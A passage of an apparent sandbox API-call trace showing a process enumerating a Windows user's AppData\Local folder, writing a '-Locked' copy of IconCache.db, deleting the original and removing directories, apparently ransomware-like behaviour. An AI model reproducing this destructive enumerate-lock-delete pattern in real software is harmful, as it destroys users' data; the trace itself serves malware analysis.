nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MicrosoftEdge", cAlternateFileName="MICROS~2")) returned 1 [0301.932] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x217bac55, ftLastAccessTime.dwHighDateTime=0x1d70503, ftLastWriteTime.dwLowDateTime=0x217bac55, ftLastWriteTime.dwHighDateTime=0x1d70503, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Packages", cAlternateFileName="")) returned 1 [0301.932] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73f4dcd0, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73f4dcd0, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73f4dcd0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PeerDistRepub", cAlternateFileName="PEERDI~1")) returned 1 [0301.932] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc699b5c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc699b5c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc699b5c, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Publishers", cAlternateFileName="PUBLIS~1")) returned 1 [0301.932] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xe23fd35a, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xe23fd35a, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0301.933] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0301.933] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40a64b1d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40a64b1d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40a64b1d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TileDataLayer", cAlternateFileName="TILEDA~1")) returned 1 [0301.933] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5599aefd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5599aefd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5599aefd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0301.933] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee54 | out: lpFindFileData=0x1aee54*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0301.933] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0301.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0dc) returned 1 [0301.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0e8) returned 1 [0301.934] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\IconCache.db-Locked", nBufferLength=0x105, lpBuffer=0x1aead4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\IconCache.db-Locked", lpFilePart=0x0) returned 0x37 [0301.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefc8) returned 1 [0301.934] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\IconCache.db-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\iconcache.db-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0301.935] GetFileType (hFile=0x49c) returned 0x1 [0301.935] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefc4) returned 1 [0301.935] GetFileType (hFile=0x49c) returned 0x1 [0301.937] CloseHandle (hObject=0x49c) returned 1 [0301.937] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\IconCache.db", nBufferLength=0x105, lpBuffer=0x1aec54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\IconCache.db", lpFilePart=0x0) returned 0x30 [0301.937] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\iconcache.db")) returned 1 [0301.938] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0d4) returned 1 [0301.938] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync", nBufferLength=0x105, lpBuffer=0x1aebdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync", lpFilePart=0x0) returned 0x2e [0301.938] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync\\", nBufferLength=0x105, lpBuffer=0x1aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync\\", lpFilePart=0x0) returned 0x2f [0301.938] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync\\*", lpFindFileData=0x1aedfc | out: lpFindFileData=0x1aedfc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c3f133, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x7c3f133, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x7c3f133, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0301.940] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c3f133, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x7c3f133, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x7c3f133, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0301.940] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c3f133, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x7c3f133, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x7c3f133, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0301.940] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0301.941] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af094) returned 1 [0301.941] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0a0) returned 1 [0301.941] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0d4) returned 1 [0301.941] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync", nBufferLength=0x105, lpBuffer=0x1aebdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync", lpFilePart=0x0) returned 0x2e [0301.941] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync\\", nBufferLength=0x105, lpBuffer=0x1aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync\\", lpFilePart=0x0) returned 0x2f [0301.941] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync\\*", lpFindFileData=0x1aedfc | out: lpFindFileData=0x1aedfc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c3f133, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x7c3f133, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x7c3f133, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0301.941] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c3f133, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x7c3f133, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x7c3f133, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0301.942] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c3f133, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x7c3f133, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x7c3f133, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0301.942] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0301.944] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af094) returned 1 [0301.944] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0a0) returned 1 [0301.944] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync", nBufferLength=0x105, lpBuffer=0x1aec60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync", lpFilePart=0x0) returned 0x2e [0301.944] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0ac) returned 1 [0301.944] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\activesync"), fInfoLevelId=0x0, lpFileInformation=0x1af12c | out: lpFileInformation=0x1af12c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7c3f133, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x7c3f133, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x7c3f133, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0301.944] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0a8) returned 1 [0301.944] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ActiveSync" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\activesync")) returned 1 [0301.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0d4) returned 1 [0301.945] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Application Data", nBufferLength=0x105, lpBuffer=0x1aebdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Application Data", lpFilePart=0x0) returned 0x34 [0301.945] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Application Data\\", nBufferLength=0x105, lpBuffer=0x1aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Application Data\\", lpFilePart=0x0) returned 0x35 [0301.945] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Application Data\\*", lpFindFileData=0x1aedfc | out: lpFindFileData=0x1aedfc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0301.946] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af098) returned 1 [0301.950] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Application Data", nBufferLength=0x105, lpBuffer=0x1aec60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Application Data", lpFilePart=0x0) returned 0x34 [0301.950] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0ac) returned 1 [0301.950] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Application Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\application data"), fInfoLevelId=0x0, lpFileInformation=0x1af12c | out: lpFileInformation=0x1af12c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0301.950] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0a8) returned 1 [0301.950] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Application Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\application data")) returned 1 [0301.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0d4) returned 1 [0301.952] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms", nBufferLength=0x105, lpBuffer=0x1aebdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms", lpFilePart=0x0) returned 0x29 [0301.952] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\", nBufferLength=0x105, lpBuffer=0x1aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\", lpFilePart=0x0) returned 0x2a [0301.953] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\*", lpFindFileData=0x1aedfc | out: lpFindFileData=0x1aedfc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2397496d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0301.954] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2397496d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0301.955] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3bbf8cb3, ftLastAccessTime.dwHighDateTime=0x1d7e768, ftLastWriteTime.dwLowDateTime=0x3bbf8cb3, ftLastWriteTime.dwHighDateTime=0x1d7e768, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0301.955] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c4973c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x23c4973c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23c4973c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Unistore", cAlternateFileName="")) returned 1 [0301.955] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7c627099, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x7c627099, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UnistoreDB", cAlternateFileName="UNISTO~1")) returned 1 [0301.955] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7c627099, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x7c627099, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UnistoreDB", cAlternateFileName="UNISTO~1")) returned 0 [0301.956] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0301.956] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af094) returned 1 [0301.956] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0a0) returned 1 [0301.963] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0d4) returned 1 [0301.963] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms", nBufferLength=0x105, lpBuffer=0x1aebdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms", lpFilePart=0x0) returned 0x29 [0301.963] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\", nBufferLength=0x105, lpBuffer=0x1aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\", lpFilePart=0x0) returned 0x2a [0301.963] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\*", lpFindFileData=0x1aedfc | out: lpFindFileData=0x1aedfc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2397496d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0301.964] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2397496d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0301.964] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3bbf8cb3, ftLastAccessTime.dwHighDateTime=0x1d7e768, ftLastWriteTime.dwLowDateTime=0x3bbf8cb3, ftLastWriteTime.dwHighDateTime=0x1d7e768, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0301.964] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c4973c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x23c4973c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23c4973c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Unistore", cAlternateFileName="")) returned 1 [0301.965] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7c627099, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x7c627099, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UnistoreDB", cAlternateFileName="UNISTO~1")) returned 1 [0301.965] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0301.965] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0301.965] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af094) returned 1 [0301.965] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0a0) returned 1 [0301.966] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af08c) returned 1 [0301.966] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp", nBufferLength=0x105, lpBuffer=0x1aeb94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp", lpFilePart=0x0) returned 0x2e [0301.966] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\", nBufferLength=0x105, lpBuffer=0x1aeb68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\", lpFilePart=0x0) returned 0x2f [0301.966] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\*", lpFindFileData=0x1aedb4 | out: lpFindFileData=0x1aedb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xa8cc1ad2, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xa8cc2dcd, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0301.966] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aedc4 | out: lpFindFileData=0x1aedc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xa8cc1ad2, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xa8cc2dcd, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0301.967] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aedc4 | out: lpFindFileData=0x1aedc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b315521, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xa8cc2dcd, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xa8cc2dcd, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x0, dwReserved1=0x0, cFileName="CalendarCache.dat", cAlternateFileName="CALEND~1.DAT")) returned 1 [0301.967] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aedc4 | out: lpFindFileData=0x1aedc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, 